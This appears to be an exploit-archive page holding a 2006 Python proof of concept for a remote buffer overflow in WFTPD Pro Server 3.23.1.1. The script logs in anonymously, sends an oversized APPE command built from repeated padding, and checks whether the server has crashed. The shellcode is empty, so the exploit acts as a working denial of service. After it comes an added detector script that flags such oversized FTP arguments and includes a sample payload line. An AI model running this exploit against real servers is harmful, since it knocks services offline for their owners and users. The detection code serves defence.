WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC
Source: vfocus.net  Author: Joxean  Published: 2006-11-08

#!/usr/bin/env python

import sys
import struct
import ftplib

print "WFTPD Pro Server 3.23.1.1 Buffer Overflow (Only a DOS currently, simple POC)"
print "Copyright (c) Joxean Koret"
print

target = "192.168.1.13"
targetPort = "21"

try:
    ftp = ftplib.FTP()

    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to logging anonymously"
    msg = ftp.login() # Anonymous
    print "[+] Ok. Message"
    print msg
    print
except:
    print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
    sys.exit(0)


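a = "\\\\A:"

# Doubling the 4-byte unit six times gives 256 bytes of padding
for i in range(6):
    a += a

print "[+] Padding length " + str(len(a)) + " bytes"

b = "ABCD"

# Doubling "ABCD" four times gives 64 bytes
for i in range(4):
    b += b

a = a + "ABCD"*10 + b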

shellCode = ""

a = a + "JOXEAN" #+ shellCode

print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "

try:
    msg = ftp.sendcmd("APPE " + a)
    print "[!] Exploit doesn't work [" + msg + "]"
except:
    print "[+] Exploit apparently works. Trying to verify it ... "

    try:
        ftp.connect(target, targetPort)
        print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
    except:
        print "[!] Ok. Server is dead, exploit successfully executed. "
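
A defender-side check for the request this PoC sends, added here as an example (Python 3) and not part of the original PoC: it flags FTP control lines whose pathname argument is oversized or built from a short repeated unit. The 260-byte limit, the repetition heuristic, the verb set and the names inspect_ftp_line / scan_session are assumptions of this example.

```python
import re

# Assumption: Windows MAX_PATH as the longest plausible path argument.
MAX_ARG_LEN = 260
# Assumption: a 2-8 byte unit repeated 16+ times in a row is padding, not a filename.
REPEAT_RE = re.compile(rb"(.{2,8}?)\1{15,}", re.DOTALL)
# FTP verbs whose argument is a pathname (RFC 959).
PATH_VERBS = {b"APPE", b"STOR", b"RETR", b"DELE", b"CWD", b"MKD", b"RMD"}


def inspect_ftp_line(line):
    """Return findings for one client-to-server FTP control line (bytes)."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    verb = verb.upper()
    if verb not in PATH_VERBS:
        return []
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("%s argument is %d bytes, over the %d-byte limit"
                        % (verb.decode("ascii"), len(arg), MAX_ARG_LEN))
    match = REPEAT_RE.search(arg)
    if match:
        unit = match.group(1)
        findings.append("%s argument repeats %r %d times"
                        % (verb.decode("ascii"), unit, len(match.group(0)) // len(unit)))
    return findings


def scan_session(lines):
    """Return (line_number, findings) for every flagged line in a session."""
    flagged = []
    for number, line in enumerate(lines, 1):
        findings = inspect_ftp_line(line)
        if findings:
            flagged.append((number, findings))
    return flagged


# Constructed sample session; line 3 has the shape of the PoC's APPE argument.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"APPE logs/2006-11-08/upload.log\r\n",
    b"APPE " + b"\\\\A:" * 64 + b"ABCD" * 26 + b"JOXEAN" + b"\r\n",
]

if __name__ == "__main__":
    for number, findings in scan_session(SAMPLE_SESSION):
        print(number, findings)
```

The same function can be applied to command lines taken from FTP server logs or a proxy in front of the server, where an oversized APPE argument can be rejected before it reaches the daemon.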



 